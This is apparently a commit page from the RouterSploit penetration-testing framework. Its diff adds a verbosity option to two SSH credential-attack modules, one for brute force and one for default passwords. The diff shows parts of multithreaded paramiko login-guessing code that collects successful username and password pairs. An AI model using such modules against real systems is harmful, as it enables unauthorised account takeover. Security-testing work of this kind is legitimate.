SSH verbosity option

095f2a10 · Marcin Bury · 13fafdab · 095f2a10 · 095f2a10
Commit 095f2a10 authored 9 years ago by Marcin Bury
Show whitespace changes
Inline Side-by-side

Showing with 20 additions and 0 deletions

ssh_bruteforce.py routersploit/modules/creds/ssh_bruteforce.py +10 -0

ssh_default.py routersploit/modules/creds/ssh_default.py +10 -0

No files found.
--- a/routersploit/modules/creds/ssh_bruteforce.py
+++ b/routersploit/modules/creds/ssh_bruteforce.py
@@ -30,8 +30,10 @@ class Exploit(exploits.Exploit):
    threads = exploits.Option(8, 'Number of threads')
    usernames = exploits.Option('admin', 'Username or file with usernames (file://)')
    passwords = exploits.Option(wordlists.passwords, 'Password or file with passwords (file://)')
+    verbosity = exploits.Option('yes', 'Display authentication attempts')

    credentials = []
+    verb = None

    def run(self):
        self.credentials = []
@@ -58,6 +60,7 @@ class Exploit(exploits.Exploit):
        else:
            passwords = [self.passwords]

+        self.verb = self.verbosity.lower()
        collection = LockedIterator(itertools.product(usernames, passwords))
        self.run_threads(self.threads, self.target_function, collection)

@@ -73,6 +76,7 @@ class Exploit(exploits.Exploit):
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

+        if self.verb == 'yes':
            print_status(name, 'thread is starting...')

        while running.is_set():
@@ -85,10 +89,16 @@ class Exploit(exploits.Exploit):
                break
            except paramiko.ssh_exception.SSHException as err:
                ssh.close()
+                
+                if self.verb == 'yes':
                    print_error(name, err, user, password)
            else:
                running.clear()
+
+                if self.verb == 'yes':
                    print_success("{}: Authentication succeed!".format(name), user, password)
+
                self.credentials.append((user, password))

+        if self.verb == 'yes':
            print_status(name, 'thread is terminated.')
--- a/routersploit/modules/creds/ssh_default.py
+++ b/routersploit/modules/creds/ssh_default.py
@@ -29,8 +29,10 @@ class Exploit(exploits.Exploit):
    port = exploits.Option(22, 'Target port')
    threads = exploits.Option(8, 'Numbers of threads')
    defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)')
+    verbosity = exploits.Option('yes', 'Display authentication attempts')

    credentials = []
+    verb = None

    def run(self):
        self.credentials = []
@@ -52,6 +54,7 @@ class Exploit(exploits.Exploit):
        else:
            defaults = [self.defaults]

+        self.verb = self.verbosity.lower()
        collection = LockedIterator(defaults)
        self.run_threads(self.threads, self.target_function, collection)

@@ -67,6 +70,7 @@ class Exploit(exploits.Exploit):
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

+        if self.verb == 'yes':
            print_status(name, 'process is starting...')

        while running.is_set():
@@ -79,10 +83,16 @@ class Exploit(exploits.Exploit):
                break
            except paramiko.ssh_exception.SSHException as err:
                ssh.close()
+
+                if self.verb == 'yes':
                    print_error(name, err, "Username: '{}' Password: '{}'".format(user, password))
            else:
                running.clear()
+
+                if self.verb == 'yes':
                    print_success("{}: Authentication succeed!".format(name), user, password)
+
                self.credentials.append((user, password))

+        if self.verb == 'yes':
            print_status(name, 'process is terminated.')